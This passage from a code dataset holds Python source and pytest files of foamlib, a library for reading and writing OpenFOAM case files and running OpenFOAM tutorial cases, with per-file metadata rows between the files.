contents.decode("latin-1"), parse_all=True
):
self._parsed.update(self._flatten_result(parse_result))
@staticmethod
def _flatten_result(
parse_result: ParseResults, *, _keywords: Tuple[str, ...] = ()
) -> Mapping[
Tuple[str, ...], Tuple[int, Union[FoamFileBase.Data, EllipsisType], int]
]:
ret: MutableMapping[
Tuple[str, ...],
Tuple[int, Union[FoamFileBase.Data, EllipsisType], int],
] = {}
start = parse_result.locn_start
assert isinstance(start, int)
item = parse_result.value
assert isinstance(item, Sequence)
end = parse_result.locn_end
assert isinstance(end, int)
keyword, *data = item
if keyword is None:
assert not _keywords
assert len(data) == 1
assert not isinstance(data[0], ParseResults)
ret[()] = (start, data[0], end)
else:
assert isinstance(keyword, str)
ret[(*_keywords, keyword)] = (start, ..., end)
for d in data:
if isinstance(d, ParseResults):
ret.update(
Parsed._flatten_result(d, _keywords=(*_keywords, keyword))
)
else:
ret[(*_keywords, keyword)] = (start, d, end)
return ret
def __getitem__(
self, keywords: Union[str, Tuple[str, ...]]
) -> Union[FoamFileBase.Data, EllipsisType]:
if isinstance(keywords, str):
keywords = (keywords,)
_, data, _ = self._parsed[keywords]
return data
def __contains__(self, keywords: object) -> bool:
return keywords in self._parsed
def __iter__(self) -> Iterator[Tuple[str, ...]]:
return iter(self._parsed)
def __len__(self) -> int:
return len(self._parsed)
def entry_location(
self, keywords: Tuple[str, ...], *, missing_ok: bool = False
) -> Tuple[int, int]:
try:
start, _, end = self._parsed[keywords]
except KeyError:
if missing_ok:
if len(keywords) > 1:
_, _, end = self._parsed[keywords[:-1]]
end -= 1
else:
end = self._end
start = end
else:
raise
return start, end
def as_dict(self) -> FoamFileBase._File:
ret: FoamFileBase._File = {}
for keywords, (_, data, _) in self._parsed.items():
r = ret
for k in keywords[:-1]:
v = r[k]
assert isinstance(v, dict)
r = cast(FoamFileBase._File, v)
assert isinstance(r, dict)
if keywords:
r[keywords[-1]] = {} if data is ... else data
else:
assert data is not ...
r[None] = data
return ret
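# A minimal usage sketch of this (internal) parser; the input below is a hypothetical
# snippet of OpenFOAM dictionary syntax.
def _example_usage() -> None:
    parsed = Parsed(b"nu [0 2 -1 0 0 0 0] 1e-05; turbulence on;")
    print(parsed["nu"])  # a FoamFileBase.Dimensioned value
    print(parsed["turbulence"])  # True ("on" parses as a switch)
    print(parsed.as_dict())  # nested dict of the whole input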
| 9,394 | Python | .py | 272 | 25.5 | 87 | 0.536438 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,145 | _util.py | gerlero_foamlib/foamlib/_files/_util.py | import sys
from typing import Any
if sys.version_info >= (3, 9):
from collections.abc import Sequence
else:
from typing import Sequence
if sys.version_info >= (3, 10):
from typing import TypeGuard
else:
from typing_extensions import TypeGuard
def is_sequence(
value: Any,
) -> TypeGuard[Sequence[Any]]:
return isinstance(value, Sequence) and not isinstance(value, str)
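# Minimal check of the helper's behaviour: strings are Sequences but are deliberately
# not treated as such.
if __name__ == "__main__":
    assert is_sequence([1.0, 2.0, 3.0])
    assert is_sequence((1, 2, 3))
    assert not is_sequence("uniform")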
| 397 | Python | .py | 14 | 25.357143 | 69 | 0.746702 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,146 | __init__.py | gerlero_foamlib/foamlib/_files/__init__.py | from ._base import FoamFileBase
from ._files import FoamFieldFile, FoamFile
__all__ = [
"FoamFile",
"FoamFieldFile",
"FoamFileBase",
]
| 148 | Python | .py | 7 | 18.285714 | 43 | 0.7 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,147 | _files.py | gerlero_foamlib/foamlib/_files/_files.py | import sys
from typing import TYPE_CHECKING, Any, Optional, Tuple, Union, cast
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
if sys.version_info >= (3, 9):
from collections.abc import Iterator, Mapping, MutableMapping, Sequence
else:
from typing import Iterator, Mapping, MutableMapping, Sequence
from ._base import FoamFileBase
from ._io import FoamFileIO
from ._serialization import Kind, dumps
from ._util import is_sequence
if TYPE_CHECKING:
import numpy as np
class FoamFile(
FoamFileBase,
MutableMapping[
Optional[Union[str, Tuple[str, ...]]],
Union["FoamFile.Data", "FoamFile.SubDict"],
],
FoamFileIO,
):
"""
An OpenFOAM data file.
Use as a mutable mapping (i.e., like a dict) to access and modify entries.
Use as a context manager to make multiple changes to the file while saving all changes only once at the end.
"""
class SubDict(
MutableMapping[str, Union["FoamFile.Data", "FoamFile.SubDict"]],
):
"""An OpenFOAM dictionary within a file as a mutable mapping."""
def __init__(self, _file: "FoamFile", _keywords: Tuple[str, ...]) -> None:
self._file = _file
self._keywords = _keywords
def __getitem__(
self, keyword: str
) -> Union["FoamFile.Data", "FoamFile.SubDict"]:
return self._file[(*self._keywords, keyword)]
def __setitem__(
self,
keyword: str,
data: "FoamFile._SetData",
) -> None:
self._file[(*self._keywords, keyword)] = data
def __delitem__(self, keyword: str) -> None:
del self._file[(*self._keywords, keyword)]
def __iter__(self) -> Iterator[str]:
for k in self._file._iter(self._keywords):
assert k is not None
yield k
def __contains__(self, keyword: object) -> bool:
return (*self._keywords, keyword) in self._file
def __len__(self) -> int:
return len(list(iter(self)))
def update(self, *args: Any, **kwargs: Any) -> None:
with self._file:
super().update(*args, **kwargs)
def clear(self) -> None:
with self._file:
super().clear()
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self._file}', {self._keywords})"
def as_dict(self) -> FoamFileBase._Dict:
"""Return a nested dict representation of the dictionary."""
ret = self._file.as_dict(include_header=True)
for k in self._keywords:
assert isinstance(ret, dict)
v = ret[k]
assert isinstance(v, dict)
ret = cast(FoamFileBase._File, v)
return cast(FoamFileBase._Dict, ret)
@property
def version(self) -> float:
"""Alias of `self["FoamFile", "version"]`."""
ret = self["FoamFile", "version"]
if not isinstance(ret, float):
raise TypeError("version is not a float")
return ret
@version.setter
def version(self, value: float) -> None:
self["FoamFile", "version"] = value
@property
def format(self) -> Literal["ascii", "binary"]:
"""Alias of `self["FoamFile", "format"]`."""
ret = self["FoamFile", "format"]
if not isinstance(ret, str):
raise TypeError("format is not a string")
if ret not in ("ascii", "binary"):
raise ValueError("format is not 'ascii' or 'binary'")
return cast(Literal["ascii", "binary"], ret)
@format.setter
def format(self, value: Literal["ascii", "binary"]) -> None:
self["FoamFile", "format"] = value
@property
def class_(self) -> str:
"""Alias of `self["FoamFile", "class"]`."""
ret = self["FoamFile", "class"]
if not isinstance(ret, str):
raise TypeError("class is not a string")
return ret
@class_.setter
def class_(self, value: str) -> None:
self["FoamFile", "class"] = value
@property
def location(self) -> str:
"""Alias of `self["FoamFile", "location"]`."""
ret = self["FoamFile", "location"]
if not isinstance(ret, str):
raise TypeError("location is not a string")
return ret
@location.setter
def location(self, value: str) -> None:
self["FoamFile", "location"] = value
@property
def object_(self) -> str:
"""Alias of `self["FoamFile", "object"]`."""
ret = self["FoamFile", "object"]
if not isinstance(ret, str):
raise TypeError("object is not a string")
return ret
@object_.setter
def object_(self, value: str) -> None:
self["FoamFile", "object"] = value
def __getitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]]
) -> Union["FoamFile.Data", "FoamFile.SubDict"]:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
_, parsed = self._read()
value = parsed[keywords]
if value is ...:
return FoamFile.SubDict(self, keywords)
return value
def __setitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]], data: "FoamFile._SetData"
) -> None:
with self:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
try:
write_header = (
not self and "FoamFile" not in self and keywords != ("FoamFile",)
)
except FileNotFoundError:
write_header = keywords != ("FoamFile",)
if write_header:
self["FoamFile"] = {}
self.version = 2.0
self.format = "ascii"
self.class_ = "dictionary"
self.location = f'"{self.path.parent.name}"'
self.object_ = (
self.path.stem if self.path.suffix == ".gz" else self.path.name
)
kind = Kind.DEFAULT
if keywords == ("internalField",) or (
len(keywords) == 3
and keywords[0] == "boundaryField"
and (
keywords[2] in ("value", "gradient")
or keywords[2].endswith("Value")
or keywords[2].endswith("Gradient")
)
):
kind = Kind.BINARY_FIELD if self.format == "binary" else Kind.FIELD
elif keywords == ("dimensions",):
kind = Kind.DIMENSIONS
if (
kind == Kind.FIELD or kind == Kind.BINARY_FIELD
) and self.class_ == "dictionary":
if not is_sequence(data):
class_ = "volScalarField"
elif (len(data) == 3 and not is_sequence(data[0])) or len(data[0]) == 3:
class_ = "volVectorField"
elif (len(data) == 6 and not is_sequence(data[0])) or len(data[0]) == 6:
class_ = "volSymmTensorField"
elif (len(data) == 9 and not is_sequence(data[0])) or len(data[0]) == 9:
class_ = "volTensorField"
else:
class_ = "volScalarField"
self.class_ = class_
self[keywords] = data
else:
contents, parsed = self._read(missing_ok=True)
start, end = parsed.entry_location(keywords, missing_ok=True)
before = contents[:start].rstrip() + b"\n"
if len(keywords) <= 1:
before += b"\n"
after = contents[end:]
if after.startswith(b"}"):
after = b" " * (len(keywords) - 2) + after
if not after or after[:1] != b"\n":
after = b"\n" + after
if len(keywords) <= 1 and len(after) > 1 and after[:2] != b"\n\n":
after = b"\n" + after
indentation = b" " * (len(keywords) - 1)
if isinstance(data, Mapping):
if isinstance(data, (FoamFile, FoamFile.SubDict)):
data = data.as_dict()
self._write(
before
+ indentation
+ dumps(keywords[-1])
+ b"\n"
+ indentation
+ b"{\n"
+ indentation
+ b"}"
+ after
)
for k, v in data.items():
self[(*keywords, k)] = v
elif keywords:
self._write(
before
+ indentation
+ dumps(keywords[-1])
+ b" "
+ dumps(data, kind=kind)
+ b";"
+ after
)
else:
self._write(before + dumps(data, kind=kind) + after)
def __delitem__(self, keywords: Optional[Union[str, Tuple[str, ...]]]) -> None:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
contents, parsed = self._read()
start, end = parsed.entry_location(keywords)
self._write(contents[:start] + contents[end:])
def _iter(self, keywords: Tuple[str, ...] = ()) -> Iterator[Optional[str]]:
_, parsed = self._read()
yield from (k[-1] if k else None for k in parsed if k[:-1] == keywords)
def __iter__(self) -> Iterator[Optional[str]]:
yield from (k for k in self._iter() if k != "FoamFile")
def __contains__(self, keywords: object) -> bool:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
_, parsed = self._read()
return keywords in parsed
def __len__(self) -> int:
return len(list(iter(self)))
def update(self, *args: Any, **kwargs: Any) -> None:
with self:
super().update(*args, **kwargs)
def clear(self) -> None:
with self:
super().clear()
def __fspath__(self) -> str:
return str(self.path)
def as_dict(self, *, include_header: bool = False) -> FoamFileBase._File:
"""
Return a nested dict representation of the file.
:param include_header: Whether to include the "FoamFile" header in the output.
"""
_, parsed = self._read()
d = parsed.as_dict()
if not include_header:
d.pop("FoamFile", None)
return d
class FoamFieldFile(FoamFile):
"""An OpenFOAM dictionary file representing a field as a mutable mapping."""
class BoundariesSubDict(FoamFile.SubDict):
def __getitem__(self, keyword: str) -> "FoamFieldFile.BoundarySubDict":
value = super().__getitem__(keyword)
if not isinstance(value, FoamFieldFile.BoundarySubDict):
assert not isinstance(value, FoamFile.SubDict)
raise TypeError(f"boundary {keyword} is not a dictionary")
return value
class BoundarySubDict(FoamFile.SubDict):
"""An OpenFOAM dictionary representing a boundary condition as a mutable mapping."""
@property
def type(self) -> str:
"""Alias of `self["type"]`."""
ret = self["type"]
if not isinstance(ret, str):
raise TypeError("type is not a string")
return ret
@type.setter
def type(self, data: str) -> None:
self["type"] = data
@property
def value(
self,
) -> Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]:
"""Alias of `self["value"]`."""
ret = self["value"]
if not isinstance(ret, (int, float, Sequence)):
raise TypeError("value is not a field")
return cast(
Union[
int, float, Sequence[Union[int, float, Sequence[Union[int, float]]]]
],
ret,
)
@value.setter
def value(
self,
value: Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
],
) -> None:
self["value"] = value
@value.deleter
def value(self) -> None:
del self["value"]
def __getitem__(
self, keywords: Optional[Union[str, Tuple[str, ...]]]
) -> Union[FoamFile.Data, FoamFile.SubDict]:
if not keywords:
keywords = ()
elif not isinstance(keywords, tuple):
keywords = (keywords,)
ret = super().__getitem__(keywords)
if keywords[0] == "boundaryField" and isinstance(ret, FoamFile.SubDict):
if len(keywords) == 1:
ret = FoamFieldFile.BoundariesSubDict(self, keywords)
elif len(keywords) == 2:
ret = FoamFieldFile.BoundarySubDict(self, keywords)
return ret
@property
def dimensions(self) -> Union[FoamFile.DimensionSet, Sequence[Union[int, float]]]:
"""Alias of `self["dimensions"]`."""
ret = self["dimensions"]
if not isinstance(ret, FoamFile.DimensionSet):
raise TypeError("dimensions is not a DimensionSet")
return ret
@dimensions.setter
def dimensions(
self, value: Union[FoamFile.DimensionSet, Sequence[Union[int, float]]]
) -> None:
self["dimensions"] = value
@property
def internal_field(
self,
) -> Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]:
"""Alias of `self["internalField"]`."""
ret = self["internalField"]
if not isinstance(ret, (int, float, Sequence)):
raise TypeError("internalField is not a field")
return cast(Union[int, float, Sequence[Union[int, float]]], ret)
@internal_field.setter
def internal_field(
self,
value: Union[
int,
float,
Sequence[Union[int, float, Sequence[Union[int, float]]]],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
],
) -> None:
self["internalField"] = value
@property
def boundary_field(self) -> "FoamFieldFile.BoundariesSubDict":
"""Alias of `self["boundaryField"]`."""
ret = self["boundaryField"]
if not isinstance(ret, FoamFieldFile.BoundariesSubDict):
assert not isinstance(ret, FoamFile.SubDict)
raise TypeError("boundaryField is not a dictionary")
return ret
@boundary_field.setter
def boundary_field(self, value: Mapping[str, FoamFile._Dict]) -> None:
self["boundaryField"] = value
| 16,025 | Python | .py | 394 | 28.941624 | 112 | 0.526597 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,148 | _serialization.py | gerlero_foamlib/foamlib/_files/_serialization.py | import array
import itertools
import sys
from enum import Enum, auto
if sys.version_info >= (3, 9):
from collections.abc import Mapping
else:
from typing import Mapping
from ._base import FoamFileBase
from ._util import is_sequence
try:
import numpy as np
numpy = True
except ModuleNotFoundError:
numpy = False
class Kind(Enum):
DEFAULT = auto()
SINGLE_ENTRY = auto()
FIELD = auto()
BINARY_FIELD = auto()
DIMENSIONS = auto()
def dumps(
data: FoamFileBase._SetData,
*,
kind: Kind = Kind.DEFAULT,
) -> bytes:
if numpy and isinstance(data, np.ndarray):
return dumps(data.tolist(), kind=kind)
if isinstance(data, Mapping):
entries = []
for k, v in data.items():
b = dumps(v, kind=kind)
if isinstance(v, Mapping):
entries.append(dumps(k) + b" {" + b + b"}")
elif not b:
entries.append(dumps(k) + b";")
else:
entries.append(dumps(k) + b" " + b + b";")
return b" ".join(entries)
if isinstance(data, FoamFileBase.DimensionSet) or (
kind == Kind.DIMENSIONS and is_sequence(data) and len(data) == 7
):
return b"[" + b" ".join(dumps(v) for v in data) + b"]"
if (kind == Kind.FIELD or kind == Kind.BINARY_FIELD) and (
isinstance(data, (int, float))
or is_sequence(data)
and data
and isinstance(data[0], (int, float))
and len(data) in (3, 6, 9)
):
return b"uniform " + dumps(data, kind=Kind.SINGLE_ENTRY)
if (kind == Kind.FIELD or kind == Kind.BINARY_FIELD) and is_sequence(data):
if isinstance(data[0], (int, float)):
tensor_kind = b"scalar"
elif len(data[0]) == 3:
tensor_kind = b"vector"
elif len(data[0]) == 6:
tensor_kind = b"symmTensor"
elif len(data[0]) == 9:
tensor_kind = b"tensor"
else:
return dumps(data)
if kind == Kind.BINARY_FIELD:
if tensor_kind == b"scalar":
contents = b"(" + array.array("d", data).tobytes() + b")"
else:
contents = (
b"("
+ array.array("d", itertools.chain.from_iterable(data)).tobytes()
+ b")"
)
else:
contents = dumps(data, kind=Kind.SINGLE_ENTRY)
return b"nonuniform List<" + tensor_kind + b"> " + dumps(len(data)) + contents
if kind != Kind.SINGLE_ENTRY and isinstance(data, tuple):
return b" ".join(dumps(v) for v in data)
if isinstance(data, FoamFileBase.Dimensioned):
if data.name is not None:
return (
dumps(data.name)
+ b" "
+ dumps(data.dimensions, kind=Kind.DIMENSIONS)
+ b" "
+ dumps(data.value, kind=Kind.SINGLE_ENTRY)
)
return (
dumps(data.dimensions, kind=Kind.DIMENSIONS)
+ b" "
+ dumps(data.value, kind=Kind.SINGLE_ENTRY)
)
if is_sequence(data):
return b"(" + b" ".join(dumps(v, kind=Kind.SINGLE_ENTRY) for v in data) + b")"
if data is True:
return b"yes"
if data is False:
return b"no"
return str(data).encode("latin-1")
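# A few minimal examples of the serializer's output for common inputs.
if __name__ == "__main__":
    assert dumps(True) == b"yes"
    assert dumps([1.0, 2.0, 3.0]) == b"(1.0 2.0 3.0)"
    assert dumps([1, 2, 3], kind=Kind.FIELD) == b"uniform (1 2 3)"
    assert dumps(10, kind=Kind.FIELD) == b"uniform 10"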
| 3,341 | Python | .py | 97 | 25.402062 | 86 | 0.546216 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,149 | _io.py | gerlero_foamlib/foamlib/_files/_io.py | import gzip
import sys
from copy import deepcopy
from pathlib import Path
from types import TracebackType
from typing import (
TYPE_CHECKING,
Optional,
Tuple,
Type,
Union,
)
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from ._parsing import Parsed
if TYPE_CHECKING:
import os
class FoamFileIO:
def __init__(self, path: Union["os.PathLike[str]", str]) -> None:
self.path = Path(path).absolute()
self.__contents: Optional[bytes] = None
self.__parsed: Optional[Parsed] = None
self.__defer_io = 0
self.__dirty = False
def __enter__(self) -> Self:
if self.__defer_io == 0:
self._read(missing_ok=True)
self.__defer_io += 1
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
self.__defer_io -= 1
if self.__defer_io == 0 and self.__dirty:
assert self.__contents is not None
self._write(self.__contents)
def _read(self, *, missing_ok: bool = False) -> Tuple[bytes, Parsed]:
if not self.__defer_io:
try:
contents = self.path.read_bytes()
except FileNotFoundError:
contents = None
else:
assert isinstance(contents, bytes)
if self.path.suffix == ".gz":
contents = gzip.decompress(contents)
if contents != self.__contents:
self.__contents = contents
self.__parsed = None
if self.__contents is None:
if missing_ok:
return b"", Parsed(b"")
raise FileNotFoundError(self.path)
if self.__parsed is None:
parsed = Parsed(self.__contents)
self.__parsed = parsed
return self.__contents, deepcopy(self.__parsed)
def _write(self, contents: bytes) -> None:
self.__contents = contents
self.__parsed = None
if not self.__defer_io:
if self.path.suffix == ".gz":
contents = gzip.compress(contents)
self.path.write_bytes(contents)
self.__dirty = False
else:
self.__dirty = True
def __repr__(self) -> str:
return f"{type(self).__qualname__}('{self.path}')"
| 2,467 | Python | .py | 74 | 24.391892 | 73 | 0.562053 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,150 | _base.py | gerlero_foamlib/foamlib/_files/_base.py | import sys
from dataclasses import dataclass
from typing import TYPE_CHECKING, Dict, NamedTuple, Optional, Tuple, Union
if TYPE_CHECKING:
import numpy as np
if sys.version_info >= (3, 9):
from collections.abc import Mapping, Sequence
else:
from typing import Mapping, Sequence
class FoamFileBase:
class DimensionSet(NamedTuple):
mass: Union[int, float] = 0
length: Union[int, float] = 0
time: Union[int, float] = 0
temperature: Union[int, float] = 0
moles: Union[int, float] = 0
current: Union[int, float] = 0
luminous_intensity: Union[int, float] = 0
def __repr__(self) -> str:
return f"{type(self).__qualname__}({', '.join(f'{n}={v}' for n, v in zip(self._fields, self) if v != 0)})"
@dataclass
class Dimensioned:
value: Union[int, float, Sequence[Union[int, float]]] = 0
dimensions: Union["FoamFileBase.DimensionSet", Sequence[Union[int, float]]] = ()
name: Optional[str] = None
def __post_init__(self) -> None:
if not isinstance(self.dimensions, FoamFileBase.DimensionSet):
self.dimensions = FoamFileBase.DimensionSet(*self.dimensions)
Data = Union[
str,
int,
float,
bool,
Dimensioned,
DimensionSet,
Sequence["Data"],
Mapping[str, "Data"],
]
"""
A value that can be stored in an OpenFOAM file.
"""
_Dict = Dict[str, Union["Data", "_Dict"]]
_File = Dict[Optional[str], Union["Data", "_Dict"]]
_SetData = Union[
str,
int,
float,
bool,
Dimensioned,
DimensionSet,
Sequence["_SetData"],
Mapping[str, "_SetData"],
"np.ndarray[Tuple[()], np.dtype[np.generic]]",
"np.ndarray[Tuple[int], np.dtype[np.generic]]",
"np.ndarray[Tuple[int, int], np.dtype[np.generic]]",
]
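# A minimal usage sketch of the data containers defined above.
if __name__ == "__main__":
    gravity = FoamFileBase.Dimensioned(
        name="g",
        dimensions=FoamFileBase.DimensionSet(mass=1, length=1, time=-2),
        value=[0, 0, -9.81],
    )
    print(gravity.dimensions)  # DimensionSet(mass=1, length=1, time=-2)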
| 1,920 | Python | .py | 56 | 26.892857 | 118 | 0.59493 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,151 | test_flange_async.py | gerlero_foamlib/tests/test_cases/test_flange_async.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import AsyncGenerator
else:
from typing import AsyncGenerator
import pytest
import pytest_asyncio
from foamlib import AsyncFoamCase, AsyncSlurmFoamCase, CalledProcessError
@pytest_asyncio.fixture(params=[AsyncFoamCase, AsyncSlurmFoamCase])
async def flange(request: pytest.FixtureRequest) -> AsyncGenerator[AsyncFoamCase, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "basic" / "laplacianFoam" / "flange"
of11_path = tutorials_path / "legacy" / "basic" / "laplacianFoam" / "flange"
case = request.param(path if path.exists() else of11_path)
assert isinstance(case, AsyncFoamCase)
async with case.clone() as clone:
yield clone
@pytest.mark.asyncio
@pytest.mark.parametrize("parallel", [True, False])
async def test_run(flange: AsyncFoamCase, parallel: bool) -> None:
if parallel:
if not (flange.path / "Allrun-parallel").exists():
pytest.skip()
with flange.decompose_par_dict as d:
assert d["method"] == "scotch"
d["numberOfSubdomains"] = 2
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(parallel=parallel, fallback=True)
else:
await flange.run(parallel=parallel)
if parallel:
await flange.reconstruct_par()
await flange.clean()
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(parallel=parallel, fallback=True)
else:
await flange.run(parallel=parallel)
@pytest.mark.asyncio
async def test_run_cmd(flange: AsyncFoamCase) -> None:
if not flange:
await flange.restore_0_dir()
ans_path = (
Path(os.environ["FOAM_TUTORIALS"]) / "resources" / "geometry" / "flange.ans"
)
if not ans_path.exists():
ans_path = Path("flange.ans")
await flange.run(
[
"ansysToFoam",
ans_path,
"-scale",
"0.001",
],
cpus=0,
)
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run([flange.application], fallback=True)
else:
await flange.run([flange.application])
@pytest.mark.asyncio
async def test_run_cmd_shell(flange: AsyncFoamCase) -> None:
if not flange:
await flange.restore_0_dir()
try:
await flange.run(
'ansysToFoam "$FOAM_TUTORIALS/resources/geometry/flange.ans" -scale 0.001',
cpus=0,
)
except CalledProcessError:
await flange.run('ansysToFoam "flange.ans" -scale 0.001', cpus=0)
if isinstance(flange, AsyncSlurmFoamCase):
await flange.run(flange.application, fallback=True)
else:
await flange.run(flange.application)
def test_path(flange: AsyncFoamCase) -> None:
assert Path(flange) == flange.path
| 2,869 | Python | .py | 78 | 30.358974 | 88 | 0.675939 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,152 | test_cavity_async.py | gerlero_foamlib/tests/test_cases/test_cavity_async.py | import os
import stat
import sys
from pathlib import Path
from typing import Sequence
if sys.version_info >= (3, 9):
from collections.abc import AsyncGenerator
else:
from typing import AsyncGenerator
import pytest
import pytest_asyncio
from foamlib import AsyncFoamCase
@pytest_asyncio.fixture(params=[False, True])
async def cavity(request: pytest.FixtureRequest) -> AsyncGenerator[AsyncFoamCase, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = AsyncFoamCase(path if path.exists() else of11_path)
async with case.clone() as clone:
if request.param:
run = clone.path / "run"
assert not run.exists()
assert not (clone.path / "Allrun").exists()
run.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).run(parallel=False)"
)
run.chmod(run.stat().st_mode | stat.S_IEXEC)
clean = clone.path / "clean"
assert not clean.exists()
assert not (clone.path / "Allclean").exists()
clean.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).clean()"
)
clean.chmod(clean.stat().st_mode | stat.S_IEXEC)
yield clone
@pytest.mark.asyncio
async def test_run(cavity: AsyncFoamCase) -> None:
await cavity.run(parallel=False)
await cavity.clean()
await cavity.run(parallel=False)
assert len(cavity) > 0
internal = cavity[-1]["U"].internal_field
assert isinstance(internal, Sequence)
assert len(internal) == 400
@pytest.mark.asyncio
async def test_double_clean(cavity: AsyncFoamCase) -> None:
await cavity.clean()
await cavity.clean(check=True)
await cavity.run(parallel=False)
@pytest.mark.asyncio
async def test_cell_centers(cavity: AsyncFoamCase) -> None:
await cavity.block_mesh()
C = await cavity[0].cell_centers()
assert isinstance(C.internal_field, list)
assert len(C.internal_field) == 400
def test_map(cavity: AsyncFoamCase) -> None:
async def f(x: Sequence[float]) -> float:
async with cavity.clone() as clone:
clone[0]["U"].boundary_field["movingWall"].value = [x[0], 0, 0]
await clone.run(parallel=False)
U = clone[-1]["U"].boundary_field["movingWall"].value
assert not isinstance(U, (int, float))
assert len(U) == 3
ret = U[0]
assert isinstance(ret, (int, float))
return ret
assert AsyncFoamCase.map(f, [[1], [2]]) == [1, 2]
assert AsyncFoamCase.map(f, [[3]]) == [3]
| 2,866 | Python | .py | 68 | 35.132353 | 149 | 0.6548 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,153 | test_flange.py | gerlero_foamlib/tests/test_cases/test_flange.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
import pytest
from foamlib import CalledProcessError, FoamCase
@pytest.fixture
def flange() -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "basic" / "laplacianFoam" / "flange"
of11_path = tutorials_path / "legacy" / "basic" / "laplacianFoam" / "flange"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
yield clone
@pytest.mark.parametrize("parallel", [True, False])
def test_run(flange: FoamCase, parallel: bool) -> None:
if parallel:
if not (flange.path / "Allrun-parallel").exists():
pytest.skip()
with flange.decompose_par_dict as d:
assert d["method"] == "scotch"
d["numberOfSubdomains"] = 2
flange.run(parallel=parallel)
if parallel:
flange.reconstruct_par()
flange.clean()
flange.run(parallel=parallel)
def test_run_cmd(flange: FoamCase) -> None:
if not flange:
flange.restore_0_dir()
ans_path = (
Path(os.environ["FOAM_TUTORIALS"]) / "resources" / "geometry" / "flange.ans"
)
if not ans_path.exists():
ans_path = Path("flange.ans")
flange.run(
[
"ansysToFoam",
ans_path,
"-scale",
"0.001",
],
)
flange.run([flange.application])
def test_run_cmd_shell(flange: FoamCase) -> None:
if not flange:
flange.restore_0_dir()
try:
flange.run(
'ansysToFoam "$FOAM_TUTORIALS/resources/geometry/flange.ans" -scale 0.001'
)
except CalledProcessError:
flange.run('ansysToFoam "flange.ans" -scale 0.001')
flange.run(flange.application)
def test_path(flange: FoamCase) -> None:
assert Path(flange) == flange.path
| 1,966 | Python | .py | 59 | 26.983051 | 86 | 0.64036 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,154 | test_cavity.py | gerlero_foamlib/tests/test_cases/test_cavity.py | import os
import stat
import sys
from pathlib import Path
from typing import Sequence
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
import pytest
from foamlib import FoamCase
@pytest.fixture(params=[False, True])
def cavity(request: pytest.FixtureRequest) -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
if request.param:
run = clone.path / "run"
assert not run.exists()
